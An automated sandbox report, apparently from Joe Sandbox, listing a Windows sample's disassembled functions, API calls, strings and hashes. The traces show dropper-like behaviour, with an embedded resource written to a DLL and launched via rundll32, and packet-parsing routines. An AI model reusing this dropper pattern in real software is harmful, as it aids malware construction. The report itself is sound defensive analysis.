                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastrecv
                                                        • String ID:
                                                        • API String ID: 2514157807-0
                                                        • Opcode ID: 5be7b8d7eff02e2d61197a09316e23989463b377d0f2ad78a0871316bafee45c
                                                        • Instruction ID: 1fdd32086d9e9c38df168da1f283ad39edcec163d985acbf857f9f61871e7d04
                                                        • Opcode Fuzzy Hash: 5be7b8d7eff02e2d61197a09316e23989463b377d0f2ad78a0871316bafee45c
                                                        • Instruction Fuzzy Hash: 60F028302042004ADB30DB24CD48FB737A99F45710F2449BEFD4AF22D1C6F8E8809669
                                                        Function 00414D00 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                        • Instruction ID: 04587d72bb115fda03d64dfd7cc9ff104913430e0cca27c1a44ccc7680737388
                                                        • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                        • Instruction Fuzzy Hash: F4819271214B418FC724CF29C890AAAB7E2FFD5314F14892ED0EA87755D738A849CB58
                                                        Function 004028B1 Relevance: 54.5, APIs: 24, Strings: 7, Instructions: 226networkstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: sprintf$htons$strncpy$inet_ntoa$htonlmemcpystrcpy
                                                        • String ID: %s%c$%s:%d$FSRPAU$FSRPAU$Len=%d$flag:$type=%d,code=%d
                                                        • API String ID: 3753906667-237590085
                                                        • Opcode ID: 3e90cc2f0e4d0af74856bd855762fbf6a17451d38533c024310741cd70ed4ee0
                                                        • Instruction ID: a53d3f022a17ab101e70b7c90ccdcaa7e2f0d08fd5b2c767e99d7cb1b96ba65e
                                                        • Opcode Fuzzy Hash: 3e90cc2f0e4d0af74856bd855762fbf6a17451d38533c024310741cd70ed4ee0
                                                        • Instruction Fuzzy Hash: 0171D172900248AEDB11DFA8CC44EEF7BBCAF48300F044466FA44F7191D678EA54CBA8
                                                        Function 00401160 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 157COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 401160-4011b2 _EH_prolog #537 * 2 #540 98 4011b4-4011cb #2818 97->98 99 4011ea-40120c #6199 #2614 97->99 100 4011da-4011e8 #939 98->100 101 4011cd-4011d5 #941 98->101 102 401211-401219 99->102 103 40120e 99->103 100->98 100->99 101->100 104 4012f8-401346 #6199 * 2 #800 * 3 102->104 105 40121f-401224 102->105 103->102 106 401227-40122d 105->106 107 401233-401252 #2818 106->107 108 4012bd 106->108 110 401261-401271 #939 107->110 111 401254-40125c #941 107->111 109 4012c1-4012ca 108->109 112 4012e3-4012e7 109->112 113 4012cc-4012de #941 * 2 109->113 114 401273-40127c 110->114 115 401295-4012a4 #2818 110->115 111->110 116 4012f5 112->116 117 4012e9-4012ef 112->117 113->112 114->115 118 40127e-401293 #2818 114->118 119 4012a5-4012b5 #939 115->119 116->104 117->105 117->116 118->119 119->106 120 4012bb 119->120 120->109
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401165
                                                        • #537.MFC42(00406598), ref: 0040117E
                                                        • #537.MFC42(00406598,00406598), ref: 0040118B
                                                        • #540.MFC42(00406598,00406598), ref: 00401197
                                                        • #2818.MFC42(?,%6.6X,00000000,00406598,00406598), ref: 004011BE
                                                        • #941.MFC42(00406044), ref: 004011D5
                                                        • #939.MFC42(?), ref: 004011E1
                                                        • #6199.MFC42(?,00406598,00406598), ref: 004011F0
                                                        • #2614.MFC42(?,00406598,00406598), ref: 004011F8
                                                        • #2818.MFC42(?,%2.2X ,?,?,00406598,00406598), ref: 00401247
                                                        • #941.MFC42(00406038), ref: 0040125C
                                                        • #939.MFC42(?), ref: 00401268
                                                        • #2818.MFC42(?,00406034,?,?), ref: 0040128B
                                                        • #2818.MFC42(?,00406030,?), ref: 0040129E
                                                        • #939.MFC42(?,?), ref: 004012AC
                                                        • #941.MFC42(00406044,?,00406598,00406598), ref: 004012D5
                                                        • #941.MFC42(00406044,00406044,?,00406598,00406598), ref: 004012DE
                                                        • #6199.MFC42(?,?,00406598,00406598), ref: 00401301
                                                        • #6199.MFC42(?,?,?,00406598,00406598), ref: 0040130F
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 0040131B
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401327
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401333
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #2818#941$#6199#800#939$#537$#2614#540H_prolog
                                                        • String ID: %2.2X $%6.6X$D`@
                                                        • API String ID: 3308870338-4221501666
                                                        • Opcode ID: 20f37d9169c0ec6644e067ea3bad11262685dea0dac38ba345f792653d56fa1a
                                                        • Instruction ID: b9ffc5d633f4d1405bf7982aaa5686ba721c81fb604f9ffe8360b73c1c5d8c85
                                                        • Opcode Fuzzy Hash: 20f37d9169c0ec6644e067ea3bad11262685dea0dac38ba345f792653d56fa1a
                                                        • Instruction Fuzzy Hash: 67516072C0011A9ADF05EBA5C986AEEB7B8AF65308F10407FE502B71D2D77C5E09C769
                                                        Function 00401A2D Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209filesleepprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00401B38
                                                        • Sleep.KERNEL32(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401B90
                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BA2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00401BA9
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401BFA
                                                        • wsprintfA.USER32 ref: 00401C21
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401C5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFilewsprintf$CloseDirectoryFindHandleLoadLockModuleNameProcessSizeofSleepWritememcpymemset
                                                        • String ID: %s "%s",QueryPluginInterface %s$%s\%s.dll$D$IMAGE$c:\%s$c:\windows\system32\rundll32.exe
                                                        • API String ID: 729933531-2732814730
                                                        • Opcode ID: a011a6132aa91ba2efff9dd4d5e13aad28595f414ba8ab3d4d84eb12781f2273
                                                        • Instruction ID: 922f0755652aa06ef568071101b0f14043c98d7905c641deb23ee6d51d764bee
                                                        • Opcode Fuzzy Hash: a011a6132aa91ba2efff9dd4d5e13aad28595f414ba8ab3d4d84eb12781f2273
                                                        • Instruction Fuzzy Hash: F86193B2A00248BEDB119BF4CD45FDFBBBCAB89304F1044BAF345B6181DA749A458F65
                                                        Function 00401F19 Relevance: 36.2, APIs: 24, Instructions: 151windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401F1E
                                                        • #4710.MFC42 ref: 00401F2B
                                                        • GetSystemMenu.USER32(?,00000000), ref: 00401F36
                                                        • #2863.MFC42(00000000), ref: 00401F3D
                                                        • #540.MFC42(00000000), ref: 00401F4C
                                                        • #4160.MFC42(00000065,00000000), ref: 00401F5B
                                                        • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401F79
                                                        • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401F85
                                                        • #800.MFC42(00000065,00000000), ref: 00401F90
                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401FB1
                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401FBF
                                                        • #823.MFC42(00000128), ref: 00401FC6
                                                        • #2086.MFC42(00000082), ref: 00401FFE
                                                        • #6215.MFC42(00000005,00000082), ref: 0040200F
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402021
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402033
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402042
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402050
                                                        • #3996.MFC42(00000000,00406328,00000000,00000028,000000FF), ref: 00402065
                                                        • #3996.MFC42(00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040207C
                                                        • #3996.MFC42(00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040208E
                                                        • #3996.MFC42(00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000), ref: 004020A1
                                                        • #3996.MFC42(00000004,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001), ref: 004020B4
                                                        • InitializeCriticalSection.KERNEL32(?,00000004,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF), ref: 004020C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$#3996$Menu$Append$#2086#2863#4160#4710#540#6215#800#823CriticalH_prologInitializeSectionSystem
                                                        • String ID:
                                                        • API String ID: 2371848494-0
                                                        • Opcode ID: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction ID: 22c113c14c16facbbd4b385fd64242b7c064b1ff54e6b864585585fb015a5088
                                                        • Opcode Fuzzy Hash: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction Fuzzy Hash: 1B41E6B02407097BE6257B21CC86F6F769DFB84798F10063DF2A5761E1CBB96C008A68
                                                        Function 0040141D Relevance: 13.6, APIs: 9, Instructions: 75windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 167 40141d-40142c 168 401432-40147b SendMessageA * 3 167->168 169 4014ef-4014f4 167->169 170 4014ad-4014b5 168->170 171 40147d-4014ab SendMessageA * 3 168->171 172 4014e7-4014ee 170->172 173 4014b7-4014e5 SendMessageA * 3 170->173 171->170 172->169 173->172
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040144F
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040145E
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040146D
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040148D
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401499
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014AB
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004014C7
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004014D3
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction ID: bb5fe5f59efd3e526b113e407ce870d9a6257fa786e4d84f1a1b66b5d905c888
                                                        • Opcode Fuzzy Hash: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction Fuzzy Hash: 6B215B7161434DBFE721AF24CC80FABBFADFB44394F40052AB59852060C7716C28CBA1
                                                        Function 004014F5 Relevance: 13.6, APIs: 9, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 00401527
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401536
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401545
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00401565
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401571
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 00401583
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040159F
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004015AB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004015BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction ID: d9274a69ea71e40b52450c2f1abff6bb4cc12b44bfabd653b35ee0167fd8c358
                                                        • Opcode Fuzzy Hash: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction Fuzzy Hash: 5A213B7161435DBFEB11AF25CC80FABBFADFB44384F40052AB59852160D7716D289BA1
                                                        Function 00401349 Relevance: 13.6, APIs: 9, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040137B
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040138A
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401399
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013B5
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013C1
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004013D3
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013EF
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013FB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 0040140D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction ID: 56a25f80e609cbd08b066c68ee1e37c059073ee632eaa49d0b548e2ccd918b9e
                                                        • Opcode Fuzzy Hash: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction Fuzzy Hash: 49215CB160535DBFEB21AF258C80FABFFADFB44394F00052AB59852060C7716D28DBA1
                                                        Function 00401000 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #567$#324BrushCreateH_prologSolid
                                                        • String ID: D@
                                                        • API String ID: 1271399592-116940557
                                                        • Opcode ID: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction ID: 13884b46de095b52d8f8717c358092e8eec3470aa280cab25804e1b70b61f98b
                                                        • Opcode Fuzzy Hash: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction Fuzzy Hash: 9D01FCB16003549BDB209F69C58978EBBE0FF81348F00443EE9926B2C2C7B85A08D765
                                                        Function 00402226 Relevance: 10.5, APIs: 7, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402237
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402252
                                                        • #3286.MFC42(-00000001,?,?,?,?,?,00402216), ref: 00402261
                                                        • #825.MFC42(?,-00000001,?,?,?,?,?,00402216), ref: 0040226F
                                                        • #825.MFC42(00000000,?,-00000001,?,?,?,?,?,00402216), ref: 00402275
                                                        • SendMessageA.USER32(?,00001008,-00000001,00000000), ref: 0040228A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402294
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #825CriticalMessageSectionSend$#3286EnterLeave
                                                        • String ID:
                                                        • API String ID: 2141797828-0
                                                        • Opcode ID: 323f0198a590fc7c46d0ed78c3b8e8f05eec79b14fe5701699f0680afc707adc
                                                        • Instruction ID: b9e60a6790c5ed3c642633d5835f906307b00da717bc424c3a2b37c864f405ef
                                                        • Opcode Fuzzy Hash: 323f0198a590fc7c46d0ed78c3b8e8f05eec79b14fe5701699f0680afc707adc
                                                        • Instruction Fuzzy Hash: 64F0F472205215BFE2156B61EE09F8BBB58FF84321F10013BF709B20E19BF4680096A8
                                                        Function 00401E2A Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401E2F
                                                        • #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                        • #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                        • #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                        • LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #567$#1146#1168#324H_prologIconLoad
                                                        • String ID:
                                                        • API String ID: 2995884226-0
                                                        • Opcode ID: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction ID: 6195de06ed0686a01f6ea18af6a3778e2a15774cd3760b5cb09f72b4f9ec5dc5
                                                        • Opcode Fuzzy Hash: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction Fuzzy Hash: EF01C0B1A00384AAD711EB65C50979FBBA4FF91308F00887EE586732C1C7F81604D7A9
                                                        Function 0040174F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • ekimhuqcroanflvzgdjtxypswb, xrefs: 0040175B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: rand$CountTicksrand
                                                        • String ID: ekimhuqcroanflvzgdjtxypswb
                                                        • API String ID: 3923125369-3762667353
                                                        • Opcode ID: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction ID: 0f0927eb61d3c32e8c18992b3a3ed773e98e9a1b9926048b9e47f112dc32a9e4
                                                        • Opcode Fuzzy Hash: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction Fuzzy Hash: 1FF04C33B0030457C7107F6A6984D9BBB999BC9720F01403EFE046B281C6B5940286B4
